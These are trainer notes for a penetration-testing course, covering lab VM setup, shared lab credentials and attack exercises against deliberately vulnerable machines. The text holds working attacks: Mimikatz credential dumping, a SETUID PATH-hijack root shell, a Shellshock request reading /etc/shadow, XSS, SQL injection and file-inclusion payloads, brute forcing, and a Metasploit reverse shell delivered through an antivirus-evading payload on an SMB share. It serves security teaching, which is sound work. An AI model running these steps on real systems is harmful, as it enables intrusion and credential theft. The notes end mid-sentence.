Certified Lead Penetration Tester training

Trainer Notes

www.pecb.com
Symbols used across the document:...................................................................................3

Running the Labs (Virtual Machines)...................................................................................4

Where to Download............................................................................................................................................................ 4
Software needed to run the Vms................................................................................................................................... 5
Network Configuration on VMs..................................................................................................................................... 5
LABs Configuration & Setup............................................................................................................................................ 6
Configuration (a) – Students Environment.............................................................................................................. 6
Configuration (b) – Trainer non-isolated environment......................................................................................7
Configuration (c) – Trainer isolated environment................................................................................................7
Further Notes:....................................................................................................................................................................... 7
Labs – Virtual Machines..................................................................................................................................................10
Windows VM’s................................................................................................................................................................... 10
Unquoted Service Path Exploit (optional LAB).................................................................................................... 12
Pass the Hash Further information (optional reading & exploit modules).............................................12
Linux Lab & VM................................................................................................................................................................. 13
SETUID exploit ‘bedrock’............................................................................................................................................... 13
SHELLSHOCK exploit:...................................................................................................................................................... 14
Brute force attack:............................................................................................................................................................ 14
Vulnerable Web Apps VM.............................................................................................................................................. 14
Web App Solutions from the presentations........................................................................................................... 17
Kali Linux – Virtual Machine ready for Pen Testing...........................................................................................17
How to enable SSH on Kali Linux (for students to access remotely)..........................................................18
Additional Steps (optional)........................................................................................................................................... 18
4) MOTD – Message of the Day banner (optional)............................................................................................. 19
How to create a new normal user with sudo permission in Kali Linux......................................................20

Exercises & Tools..............................................................................................................21

DNS.......................................................................................................................................................................................... 21
Nmap:...................................................................................................................................................................................... 21
Nmap Scripting for DNS:................................................................................................................................................ 22
Activity Port Scanning / Network capturing.........................................................................................................23
Basic Network mapping using NMAP...................................................................................................................... 23
Basic Windows Port Scanning / Windows Service mapping.........................................................................24
Basic Nmap scanning against <host>...................................................................................................................... 24
Network capturing / TCPDump or Wireshark..................................................................................................... 24

www.pecb.com
2
Basic Nmap / SMB NSE Scripts...................................................................................................................................26
Enumeration of Users...................................................................................................................................................... 26
Enumeration of Shares................................................................................................................................................... 26
Brute forcing accounts................................................................................................................................................... 26
Basic Vulnerability checking........................................................................................................................................ 26
Sessions Enumerations................................................................................................................................................... 27
Enumeration of Users...................................................................................................................................................... 27

Advanced Enumerations...................................................................................................28
LDAP Enumeration using NMAP Scripts.................................................................................................................28
LDAP Brute Force (only for reference).................................................................................................................... 28
TRAINER CHECKS:............................................................................................................................................................ 30
Note for trainers:............................................................................................................................................................... 37

Symbols used across the document:

Tools

Code

CMD

URL/Website

Task/Exercise/Activity

VM – {name}

www.pecb.com
3
Running the Labs (Virtual Machines)
The labs are designed to be downloaded from online resources in the Internet and to
run offline in a classroom with at least a router/switch or Wi-Fi device with DHCP
enabled.

(Online Download / Offline Running)

Where to Download
a) Course Materials (including software to run the Virtual Machines)

URL/Website https://mega.co.nz/#F!NwcQVYYB
(Decryption Key = “uVSuAlkt8T4mKYpHvwLu5Q” without the quotes)

Sync URL https://link.getsync.com/#f=Course-

Material&sz=1E9&t=2&s=C2ZTCQQ2W547VERKZE2UAXE4FSJCVLV6PIR76K7JLGKE45GNYWHA
&i=CUOVIUR3MY6COOSTNL47GSTMMGEQRJ7CQ&v=2.0

b) LABS (All Virtual Machines to run the LABS)

URL/Website https://mega.co.nz/#F!ZksExZBC
(Decryption Key = “vuLLCcZUu4KZbY6zvTI_mg” without the quotes)

Sync URL
https://link.getsync.com/#f=LABS&sz=0&t=2&s=MK26ICHL7WA7I3PGULOKBFCKVSQ774NPIFHUN5
5MUUR5H7NUM3UQ&i=CMIXP3HKFAVTEQUMOYBWC7UKQL4CKPCQC&v=2.0

Figure 1 - Virtual Machines

www.pecb.com
4
Software needed to run the Vms

All the below tools can be found within the Toolz Folder within the Course
Material links.

VMWare Player (Free)

https://my.vmware.com/web/vmware/free#desktop_end_user_computing/
vmware_player/7_0

http://www.vmware.com/products/fusion/fusion-evaluation

VirtualBox (Free and recommended)

https://www.virtualbox.org

Network Configuration on VMs

Please make sure you understand the difference in between Local Host only, NAT
and Bridged networks as to make sure the connectivity in between the VMs and
students’ laptops run smoothly during the exercises.

I.e. after importing the VMs into VirtualBox check that the adapters are using your
current NAT Network Configuration or DHCP.

You may have to add a NAT Network Configuration (including the IP range)

Figure 2 - NAT Configuration on Virtual Box

www.pecb.com
5
LABs Configuration & Setup

Figure 3 - Isolated Lab Configuration

We propose three different environments as to suit most classroom configurations

without compromising security.

These following configurations can be also combined as to provide the most

convenient, yet efficient, Lab.

Configuration (a) – Students Environment.

Each student has his or her own version of the lab. VMs are large files so we
recommend distributing them using high speed/capacity external devices (USB3) or
P2P tools such as BTSync.

In this scenario each Student manage their own NAT/network using either VirtualBox
or VMWare and configuring their services accordingly.

If the time distributing the Virtual Machines allows we recommend this configuration.

(Normally the LABs will be used within the second day of the course)

www.pecb.com
6
Configuration (b) – Trainer non-isolated environment.
In this scenario all VMs use a Bridged Network configuration in which the IPs are
obtained via a DHCP Router/WiFi and reachable to the students through the same
network segment.

This configuration will be easier to setup for the initial ‘discovery modules’ but harder
to maintain the further the students advance during the hacking activities, particularly
when assessing the Linux environment as they may start modifying (or even
rebooting) the system several times.

Configuration (c) – Trainer isolated environment.

To maintain the environment isolated when running the VMs please follow the
diagram shown above (Figure 1).

This configuration will allow the students to use the Kali Linux Virtual Machine as a
‘trampoline’ to assess the rest of the environment.

We recommend, though, using a Bridged network when working with the Web App
Virtual Machine so students can use their own laptops with graphical interfaces to run
the assessments.

Further Notes:
We believe the instructor will be familiar with the use of Virtual Machines, Routers,
Wi-Fi Configurations and IP addresses on multiple OS.

The larger VMs are the Windows Labs, which could be run within the Trainer’s laptop
at all times as most exercises revolve around network discoveries.

The configurations explained before are merely examples and a combination of them
could be used, including using students’ own material and laptops as to run the
exercises and labs more efficiently.

Please review the DNS configurations on the Windows Boxes (Windows 7 and
Windows 8.1) as to make sure they can access the Domain Controller on Windows
2008 R2 Server.

The following screenshots show how to verify the connectivity with the Domain
Controller and Active Directory server.

www.pecb.com
7
Figure 4 - Domain Controller IP Address

Figure 5 - Windows 8.1 DNS configuration

www.pecb.com
8
Figure 6 - Checking if the Domain Users name are valid

www.pecb.com
9
Labs – Virtual Machines

Figure 7 - Virtual Machines

Windows VM’s
PECB-win7.sys.lab / Windows 7 Pro – Admin/P@ssw0rd!!
PECB-DC.sys.lab / Windows Server 2008 - Administrator/P@ssw0rd!!
PECB-Win8.sys.lab / Windows 8.1 – Admin/P@ssw0rd!!

(Check keyboard configuration if you are having trouble entering the passwords)

syslab\john.smith - Qazwsx12+1 – Normal user

syslab\jack.russell - Qazwsx12+1 – Domain Admin user

Windows Boxes should have a folder with Mimikatz and other tools on it.

www.pecb.com
10
 Figure 8 -Toolz Folder on user Admin

To allow Mimikatz to pull a user’s password from memory, make sure you access
some windows (shared) resources before using it.
I.e: Open \\pebc-dc with Windows Explorer and login with syslab\jack.russell

After lunching Mimikatz use the following commands:

privilege::debug
sekurlsa::logonpasswords

The debug privilege allows someone to debug a process that they wouldn’t otherwise
have access to. For example, a process running as a user with the debug privilege
enabled on its token can debug a service running as local system.
More from: http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx

mimikatz # privilege::debug

www.pecb.com
11
Privilege '20' OK
Remark: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
means that the required privilege is not held by the client (mostly you're not an
administrator )

Unquoted Service Path Exploit (optional LAB)

To exploit the unquoted service path vulnerability, the following metasploit module
can be used:
Exploit/windows/local/trusted_service_path
The module requires an open session, and once launched will look through the
system for services that are set to auto start and have been configured without
quotes in the path of their executable.
How to configure one: To introduce this vulnerability to a system, using regedit to
edit the path of the service executable, only the quotes around the path would need
to be removed.
Example:
If the path to the service is as follows - C:\Program Files\hello.exe
An attacker with write access to C\: would be able to place a malicious program in
the root of C with the name hello.exe which would get executed the next time that
service is restarted.

Pass the Hash Further information (optional reading & exploit modules)
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-sekurlsa#pth
https://www.youtube.com/watch?feature=player_embedded&v=x-bIZRU-eLM
http://tools.kali.org/password-attacks/keimpx
https://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-Hash.pdf

www.pecb.com
12
 Linux Lab & VM
msfadmin/password are the credentials to login.
Root password is ‘Qazwsx12+1!’
Webserver for exploiting the Shellshock vulnerability is set to start automatically.
Vulnerable SETUID root file (bedrock) sits in msfadmin home directory

SETUID exploit ‘bedrock’

A vulnerable SETUID root application lives in the msfadmin users home directory with
the name of ‘bedrock’. On execution it calls the system binary ‘ls’ without an explicit
PATH and can therefore be exploited to run arbitrary code.
To exploit this vulnerability the following steps would need to be performed:
A rogue ‘ls’ script with the following contents would need to be created:

msfadmin@linuxbox:nano ls

/bin/cp /bin/sh /tmp/sh

/bin/chown root /tmp/sh
/bin/chmod 6555 /tmp/sh
CTRL +Y

msfadmin@linuxbox:chmod 755 ls
Next the PATH variable would need to be changed:
msfadmin@linuxbox:Export PATH=“.”
Running the ‘bedrock’ executable now would create a SETUID root shell in /tmp
msfadmin@linuxbox:./bedrock
To test if we can execute commands as root try the following
msfadmin@linuxbox:/sbin/poweroff
poweroff: Need to be root

Now execute the SUID Shell and run the Poweroff command again ;)
msfadmin@linuxbox:./sh
#sbin/poweroff

Additional Notes SETUID

www.pecb.com
13
 a) Find sgid or suid files using the following:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
b) Look at binary to see if you can figure out what it does:
c) run strings on the binary
d) run strace (specifically strace –qfeexecve ./bedrock (to see what other
programs it calls)
e) look at permissions of other programs
f) if system binaries are called, look at how they are called and if you can
change PATH variable to exploit them
g) change PATH to "." and drop in custom "ls" file containing the following
/bin/cp /bin/sh /tmp/sh
/bin/chown root /tmp/sh
/bin/chmod 6555 /tmp/sh

suid root shell needs to be called 'sh' or run with '-p' param to get past bash
protection (drops root privileges on shells when run with suid)

SHELLSHOCK exploit:
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo;
/bin/cat /etc/shadow" http://127.0.0.1/cgi-bin/test.cgi

Apache user www-data was added to shadow group to be able to read shadow file

Brute force attack:

SSH is open and the account called msfadmin has a password set as 'password'

Vulnerable Web Apps VM

The particular Web App chosen for this course can be accessed at /WackoPicko/
(See below screenshots)

To access the VM, the credentials are root/owaspbwa

More information on the VM and the other Web Apps installed on it can be found at
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

www.pecb.com
14
If you want to download a fresh/vainilla VM for these exercises please follow this link:
http://sourceforge.net/projects/owaspbwa/files/

Running the VM (IP addresses may differ depending on installation/configuration)

Figure 9 - OWASP Vulnerable Web Applications

www.pecb.com
15
Figure 10 - Access to all Web Apps within the Virtual Machine

www.pecb.com
16
 Figure 11 - Web Application chosen for the course

Web App Solutions from the presentations

1. Reflected XSS on homepage - Search box is vulnerable and takes a standard
XSS exploit vector, eg: <script>alert()</script>
2. Stored XSS - The comment parameter in the guestbook is vulnerable to stored
XSS. Standard vector eg: <script>alert()</script>
3. Basic SQL injection - The username parameter of the login page is vulnerable.
eg: ' OR 1=1#
4. Local File Access - The page param of the admin URL is vulnerable and can be
exploited by: /admin/index.php?page=/etc/passwd%00

Kali Linux – Virtual Machine ready for Pen Testing

https://www.kali.org

Default Credentials = root / toor

www.pecb.com
17
If you need to delete the history for other students to use the VM, please type the
following command

cat /dev/null > ~/.bash_history && history -c && exit

How to enable SSH on Kali Linux (for students to access remotely)

Kali Linux does not come with SSH enabled. SSH is the preferred method of remote
management for most Linux based systems and will enable students to have a fully
configured environment to use.

root@kali:~# service --status-all

If the SSH service shows a minus sign (-) it means that it is not ‘running’

a) root@kali~:# apt-get install openssh-server from the terminal

windows.
b) Start the ssh services with the following command
root@kali~# service ssh start

Additional Steps (optional)

2) Configure SSH to run on persistently. In other words survive a reboot.
a) First we need to remove run levels for SSH by issuing the command:
root@kali~:# update-rc.d -f ssh remove

b) Now we need load the default SSH run level by issuing the following command:
root@kali~:# update-rc.d -f ssh defaults

3) Change the default SSH keys

www.pecb.com
18
We now need to change the default SSH keys. The reason for this is because every
Linux and Unix system uses similar keys. An Attacker could potentially guess or
crack your SSH keys and exploit your system using Man-in-the-Middle techniques.
a) Backup and move default Kali Linux Keys
root@kali:~# cd /etc/ssh/

root@kali:/etc/ssh# mkdir insecure_original_default_kali_keys

root@kali:/etc/ssh# mv ssh_host_* insecure_original_default_kali_keys/

b) Create new keys

Type the following command in the terminal window:
dpkg-reconfigure openssh-server
root@kali:/etc/ssh# dpkg-reconfigure openssh-server
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
Creating SSH2 ECDSA key; this may take some time ...
[ ok ] Restarting OpenBSD Secure Shell server: sshd.
root@kali:/etc/ssh#

4) MOTD – Message of the Day banner (optional)

You can create login banner, also known as a Message of the Day (MOTD) banner
on Kali Linux that is displayed when users login.
Just edit the /etc/motd file (restart ssh after you have completed the edit).
Edit the following file and add your text.
root@kali:~# vi /etc/motd
root@kali:~# service ssh restart

________________________________________
\______ \_ _____/\_ ___ \______ \
| ___/| __)_ / \ \/| | _/
| | | \\ \___| | \
|____| /_______ / \______ /______ /
\/ \/ \/

-----------------------------------------------------------------
Warning: This system is restricted to private use
authorized users for business purposes only. Unauthorized access
or use is a violation of company policy and the law. This system
may be monitored for administrative and security reasons. By
proceeding, you acknowledge that (1) you have read and understand
this notice and (2) you consent to the system monitoring.
-----------------------------------------------------------------

www.pecb.com
19
How to create a new normal user with sudo permission in Kali Linux
Open a terminal and issue the following command.
root@kali:~# useradd -m <username>

-m creates a home directory for the user.

Now we have to set a password for the user.
root@kali:~# passwd <username>

It will ask you to create a new password.

At this point, we have a new user account. But we might want to add our new user to
the "sudoers" group, so that we can use "sudo" to do administrative actions.
root@kali:~# usermod -a -G sudo <username>

The option -a means to add and '-G sudo' means to add the user to the sudo group.
If you want to know more about the usermod command, issue #man usermod
command to know more about usermod
Now we have to specify the shell for our new user.
root@kali:~# chsh -s /bin/bash <username>

chsh command is used to change the login shell for a user.

www.pecb.com
20
Exercises & Tools
Symbols:

Tools

Code

CMD

URL/Website

Task/Exercise/Activity

VM – {name}

DNS
Slide: Domain Name System (DNS) – Basics

Understanding/knowing types of Authoritative Name Servers:

Master server (primary name server)
Slave server (secondary name server)

$ host -t ns pecb.org
pecb.org name server ns3.dreamhost.com.
pecb.org name server ns1.dreamhost.com.
pecb.org name server ns2.dreamhost.com.

Nmap:

http://nmap.org/download.html (Folder Toolz)

www.pecb.com
21
Nmap Scripting for DNS:
(Slide: Operation of DNS – Pen Testing view)

dns-blacklist
Checks target IP addresses against multiple DNS anti-spam and open proxy
blacklists and returns a list of services for which an IP has been flagged. Checks may
be limited by service category (eg: SPAM, PROXY) or to a specific service name.

dns-brute
Attempts to enumerate DNS hostnames by brute force guessing of common
subdomains. With the dns-brute.srv argument, dns-brute will also try to enumerate
common DNS SRV records.

dns-cache-snoop
Performs DNS cache snooping against a DNS server.

dns-check-zone
Checks DNS zone configuration against best practices, including RFC 1912. The
configuration checks are divided into categories which each have a number of
different tests.

dns-client-subnet-scan
Performs a domain lookup using the edns-client-subnet option which allows clients to
specify the subnet that queries supposedly originate from. The script uses this option
to supply a number of geographically distributed locations in an attempt to enumerate
as many different address records as possible. The script also supports requests
using a given subnet.

dns-fuzz
Launches a DNS fuzzing attack against DNS servers.

dns-ip6-arpa-scan
Performs a quick reverse DNS lookup of an IPv6 network using a technique which
analyzes DNS server response codes to dramatically reduce the number of queries
needed to enumerate large networks.

dns-nsec-enum
Enumerates DNS names using the DNSSEC NSEC-walking technique.

dns-nsec3-enum
Tries to enumerate domain names from the DNS server that supports DNSSEC
NSEC3 records.

dns-nsid
Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid)
and asking for its id.server and version.bind values. This script performs the same
queries as the following two dig commands: - dig CH TXT bind.version @target - dig
+nsid CH TXT id.server @target

www.pecb.com
22
dns-random-srcport
Checks a DNS server for the predictable-port recursion vulnerability. Predictable
source ports can make a DNS server vulnerable to cache poisoning attacks (see
CVE-2008-1447).

dns-random-txid
Checks a DNS server for the predictable-TXID DNS recursion vulnerability.
Predictable TXID values can make a DNS server vulnerable to cache poisoning
attacks (see CVE-2008-1447).

dns-recursion
Checks if a DNS server allows queries for third-party names. It is expected that
recursion will be enabled on your own internal nameservers.

dns-service-discovery
Attempts to discover target hosts' services using the DNS Service Discovery
protocol.

dns-srv-enum
Enumerates various common service (SRV) records for a given domain name. The
service records contain the hostname, port and priority of servers for a given service.
The following services are enumerated by the script: - Active Directory Global
Catalog - Exchange Autodiscovery - Kerberos KDC Service - Kerberos Passwd
Change Service - LDAP Servers - SIP Servers - XMPP S2S - XMPP C2S

dns-update
Attempts to perform a dynamic DNS update without authentication.

dns-zeustracker
Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @
abuse.ch. Please review the following information before you start to scan:

https://zeustracker.abuse.ch/ztdns.php

dns-zone-transfer
Requests a zone transfer (AXFR) from a DNS server.

Activity Port Scanning / Network capturing

Basic Network mapping using NMAP

 NMAP Pings SYN scanning;

 Network capturing / TCPDump or Wireshark ;
 DNS Enumerations using NMAP

www.pecb.com
23
Basic Windows Port Scanning / Windows Service mapping
Basic Port mapping against a full Active Directory (Domain Controller) Windows
Server & Windows 8 host

Basic Nmap scanning against <host>

nmap –sP <local.ip.range> 172.16.204.*

nmap –sS <host> -vv
nmap –sV <host> -vv
nmap –A <host> -vv

Network capturing / TCPDump or Wireshark

Capture TCP/SYN packets

TCPDump
http://www.tcpdump.org

Lets detect a SYN scan

tcpdump -nnvv -i eth0 'tcp[tcp-syn] & (tcp-syn)' != 0 and not port 22 and host
172.16.204.143

How to view traffic of the tcpdump command Example

specific host tcpdump ‘host <ipaddress>’ tcpdump ‘host 10.10.10.1’

specific source host tcpdump ‘src host <ipaddress>’ tcpdump ‘src host 10.10.10.1’

specific destination tcpdump ‘dst host <ipaddress>’ tcpdump ‘dst host 10.10.10.1’
host

specific network tcpdump ‘net <network address>’ tcpdump ‘net 10.10.10.0’

specific source network tcpdump ‘src net <network address>’ tcpdump ‘src net 10.10.10.0’

specific destination tcpdump ‘dst net <network address>’ tcpdump ‘dst net 10.10.10.0’
network

specific port tcpdump ‘port <port-number>’ tcpdump ‘port 21’

www.pecb.com
24
specific source port tcpdump ‘src port <port-number>’ tcpdump ‘src port 21’

specific destination tcpdump ‘dst port <port-number>’ tcpdump ‘dst port 21’
port

specific host for the tcpdump ‘host <ipaddress> and port tcpdump ‘host 10.10.10.1 and
particular port <port-number>’ port 21’

the specific host for tcpdump ‘host <ipaddress> and port tcpdump ‘host 10.10.10.1 and
all the ports except not <port-number>’ port not 22’
SSH

specific protocol tcpdump ‘proto ICMP’

tcpdump ‘proto UDP’
tcpdump ‘proto TCP’
tcpdump ‘arp’

paritcular interface tcpdump interface <interface> tcpdump interface eth1

specific port of a tcpdump interface <interface> ‘port tcpdump interface eth1 ‘port
particular interface <port-number>’ 21’

Wireshark
https://www.wireshark.org

Duration of activity: 20 minutes

nmap -sSU -p 53 --script dns-nsid <target>

Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid)

and asking for its id.server and version.bind values.

This script performs the same queries as the following two dig commands:
- dig CH TXT bind.version @target
- dig +nsid CH TXT id.server @target

Example

$ sudo nmap -sSU -p 53 --script dns-nsid 192.168.1.1

Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-30 00:01 BST

Nmap scan report for 192.168.1.1
Host is up (0.0059s latency).
PORT STATE SERVICE
53/tcp open domain
53/udp open domain
| dns-nsid:
|_ bind.version: dnsmasq-2.68
MAC Address: 00:04:A7:0C:22:D3 (FabiaTech)

www.pecb.com
25
 Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

$ nmap --script dns-brute www.pecb.org

Attempts to enumerate DNS hostnames by brute force guessing of common

subdomains.

Host script results:

| dns-brute:
| DNS Brute-force hostnames:
| mysql.pecb.org - 67.205.8.96
| www.pecb.org - 67.205.10.57
| mail.pecb.org - 208.97.132.208
| ftp.pecb.org - 67.205.10.57
|_ ssh.pecb.org - 67.205.10.57

Activity Port Scanning / Windows Service mapping and basic

enumeration techniques
Basic Port mapping against a full Active Directory (Domain Controller) Windows
Server & Windows 8 host

Basic Nmap / SMB NSE Scripts

Enumeration of Users
nmap --script smb-enum-users.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139
root@kali:/# enum4linux -U -o -u "user" -p "password" <host>

Enumeration of Shares
nmap --script smb-enum-shares.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <host>
root@kali:/# enum4linux -S -o <host>

Brute forcing accounts

nmap --script smb-brute.nse -p445 <host>
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>

www.pecb.com
26
Basic Vulnerability checking
nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>

Sessions Enumerations
nmap --script smb-enum-sessions.nse -p445 <host>
sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139 <host>

(Requires any access higher than anonymous; guests, users, or administrators are
all able to perform this request on Windows 2000, XP, 2003, and Vista.)

Shares Enumerations: (OPTIONAL) If you fancy creating additional ‘open’ shares

with some Reports/XLS moc files etc

Finding open shares is useful to a penetration tester because there may be private
files shared, or, if it's writable, it could be a good place to drop a Trojan or to infect a
file that's already there. Knowing where the share is could make those kinds of tests
more useful, except that determining where the share is requires administrative
privileges already.

Running NetShareEnumAll will work anonymously against Windows 2000, and

requires a user-level account on any other Windows version.

Calling NetShareGetInfo requires an administrator account on all versions of

Windows up to 2003, as well as Windows Vista and Windows 7, if UAC is turned
down.

Even if NetShareEnumAll is restricted, attempting to connect to a share will always

reveal its existence. So, if NetShareEnumAll fails, a pre-generated list of shares,
based on a large test network, are used. If any of those succeed, they are recorded.

Enumeration of Users

From a pen-testers perspective, retrieving the list of users on any given server
creates endless possibilities.

Users are enumerated in two different ways (SAMR enumeration or LSA

bruteforcing) by using this script and in most permissive Pen Testing the default
configuration (which is using both) will suffice.

Full information regarding these two enumeration techniques can be found here:
http://nmap.org/nsedoc/scripts/smb-enum-users.html

Tools that pioneering some of the techniques used by this script goes to enum.exe,
sid2user.exe, and user2sid.exe programs which illustrated SID/RID walking techniques
plus added insight of how Microsoft Windows handled Null Sessions in the past
www.pecb.com
27
allowing anonymous users to make calls to functions such as QueryDisplayInfo which
returns a detailed list of users, along with descriptions, types, and full names.

This type of enumeration was also used to determine whether users have recently
changed their passwords or date of last update, blocked their accounts or even if
they have never logged in into the system etc.

Useful information for a Pen Tester (and attackers) to target certain accounts to start
password guessing or password brute forcing attacks.

Duration of activity: 20 minutes

Further Reading
http://www.sans.org/reading-room/whitepapers/testing/scanning-windows-deeper-
nmap-scanning-engine-33138

Advanced Enumerations

LDAP Enumeration using NMAP Scripts

LDAP Brute Force (only for reference)

nmap -p 389 --script ldap-brute --script-args \

ldap.base='"cn=users,dc=cqure,dc=net"' <host>

nmap -p 389 --script ldap-search --script-args

'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,
ldap.qfilter=users,ldap.attrib=sAMAccountName' <host>

nmap -p 389 --script ldap-search --script-args

'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,
ldap.qfilter=custom,ldap.searchattrib="operatingSystem",ldap.searchvalue="Windows
*Server*",ldap.attrib={operatingSystem,whencreated,OperatingSystemServicePack}'
<host>

Attempts to perform an LDAP search and returns all matches.

If no username and password is supplied to the script the Nmap registry is consulted.
If the ldap-brute script has been selected and it found a valid account, this account
will be used. If not anonymous bind will be used as a last attempt.

nmap -p 389 --script ldap-search --script-args

'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ld@pt3st,
ldap.qfilter=users,ldap.attrib=sAMAccountName' 172.16.204.145

www.pecb.com
28
 Activity / Apply enumeration techniques learnt with Windows
boxes against *nix systems
(Optional - Create two accounts trivially bruteforceable on the Linux box)

Wordlists in Kali Linux

root@kali:/usr/share/wordlists# ls -al
total 52128
drwxr-xr-x 2 root root 4096 Feb 10 11:23 .
drwxr-xr-x 452 root root 16384 Feb 10 11:30 ..
lrwxrwxrwx 1 root root 25 Feb 10 11:23 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx 1 root root 30 Feb 10 11:23 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx 1 root root 35 Feb 10 11:23 dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
lrwxrwxrwx 1 root root 41 Feb 10 11:23 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx 1 root root 45 Feb 10 11:23 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx 1 root root 46 Feb 10 11:23 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx 1 root root 51 Feb 10 11:23 metasploit-jtr ->
/usr/share/metasploit-framework/data/john/wordlists
lrwxrwxrwx 1 root root 39 Feb 10 11:23 metasploit-pro -> /opt/metasploit/apps/pro/data/wordlists
lrwxrwxrwx 1 root root 41 Feb 10 11:23 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r-- 1 root root 53357341 Mar 3 2013 rockyou.txt.gz
lrwxrwxrwx 1 root root 34 Feb 10 11:23 sqlmap.txt -> /usr/share/sqlmap/txt/wordlist.txt
lrwxrwxrwx 1 root root 57 Feb 10 11:23 termineter.txt ->
/usr/share/termineter/framework/data/smeter_passwords.txt
lrwxrwxrwx 1 root root 29 Feb 10 11:23 webslayer -> /usr/share/webslayer/wordlist
lrwxrwxrwx 1 root root 25 Feb 10 11:23 wfuzz -> /usr/share/wfuzz/wordlist

Hydra example
hydra -l msfadmin -P /usr/share/wordlists/metasploit/unix_passwords.txt -t
6 ssh://172.16.204.142

Activity / Basic Web Application Pen Testing

Basic Cross-Site Scripting identification, SQLi and CSRF

Setup BURP Proxy (or fiddler)

http://portswigger.net/burp/download.html
http://portswigger.net/burp/burpsuite_free_v1.6.jar

http://www.telerik.com/fiddler

www.pecb.com
29
The idea of these basic exercises will be to setup BURP proxy as to identify these
common vulnerabilities in a Vulnerable Web Site.

If there is Internet access – Students can also work over the following URL
https://google-gruyere.appspot.com/start

Please familiarise yourself with the following scenarios

https://google-gruyere.appspot.com/part2#2__xss_challenge
https://google-gruyere.appspot.com/part3#3__cross_site_request_forgery

Google Gruyere is also installed in our Web App Virtual Environment.

TRAINER CHECKS:
Open these web apps and familiarise with the examples and exploits.
If network and time allows show a full exploitation of a xss bug by stealing someone
credentials.

The Duration of this activity should take no longer than 30minutes. It usually takes
time for non-experience web app testers to setup the required environment.

XSS and SQLi vulnerabilities can be identified, even without specific tools and by
observing the web app behaviour and client side source code inspection.

Tools that can be used instead of BURP Suite are:

 Fiddler Debugger (Windows Only)
 Paros Proxy (Java)
 Webscarab (Java)
 Burp proxy (Java)

www.pecb.com
30
 Windows 8 Pen Test attack scenarios :

1) Obtaining a Remote Shell on Windows 8.1 using the Metasploit “psexec_command”

module, created by Royce Davis (@r3dy__), from Accuvant LABS.

a) Bruteforce password for the domain account john.smith (that’s Local Admin)
on the Windows 8 system using Metasploit’s SMB login checker module

Figure 12 - Metasploit Brute Force SMB example

#msf > use auxiliary/scanner/smb/smb_login

#msf auxiliary(smb_login) > set PASS_FILE ‘/home/user/password’

b) Creating an Antivirus safe (AV-safe) executable to deploy to our target using

Veil-Evasion on Kali Linux. After we have an executable, we simply create an
SMB share for our targets to access.

c) Add this section to “/etc/samba/smb.conf” on your Kali Linux distribution

(OPT-Kali-Linux-1.1.0-vm-486 is configured with Veil and Samba already)

www.pecb.com
31
[payloads$]
comment = Payloads
path = /root/veil-output/compiled
browseable = yes
read only = yes
guest ok = yes
public = yes

d) Samba on Kali Linux is not running by default, so we need to start it:

root@kali:~# service samba start
[ ok ] Starting Samba daemons: nmbd smbd.

e) Next, we startup Metasploit and open a listener:

root@kali:~# msfconsole

msf> use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.0:443

msf exploit(handler) > [*] Starting the payload handler...

f) Now, we setup “psexec_command” and configure the module to run the

executable payload directly from our SMB share:

msf exploit(handler) > use auxiliary/admin/smb/psexec_command

msf auxiliary(psexec_command) > set COMMAND start
////192.168.81.196//payloads$//PECBpt.exe
COMMAND => start //192.168.81.196/payloads$/PECBpt.exe
msf auxiliary(psexec_command) > set RHOSTS 10.0.2.7

www.pecb.com
32
RHOSTS => 10.0.2.7
msf auxiliary(psexec_command) > set SMBPass P@ssw0rd!!
SMBPass => P@ssw0rd!!
msf auxiliary(psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(psexec_command) > exploit

Figure 13 - Full exploitation on Windows 8.1

www.pecb.com
33
 Figure 14 - Using Veil Framework on Kali Linux

To install Veil Framework on a fresh Kali Linux type: apt-get install veil

2) Obtaining Shell access using PSEXEC

a) Bruteforce password for the domain account john.smith (that’s Local Admin)
on the Windows 8 system using Metasploit’s SMB login checker module

www.pecb.com
34
2. Copy PSExec and Procdump over to the target machine using the credentials
just discovered. Use mount (*nix) or net use (Windows) to mount the folder and then
copy the files over.
*Nix: mount -t cifs //target/C$ /mnt/target –o
username=adminuser,password=password,domain=targetdomain
Windows: net use e: \\target\C$ password /user:domain\adminuser

3. Login to the system using Terminal Services and get a command shell. The
user john.smith is a local admin, however to get a process dump of the lsass.exe
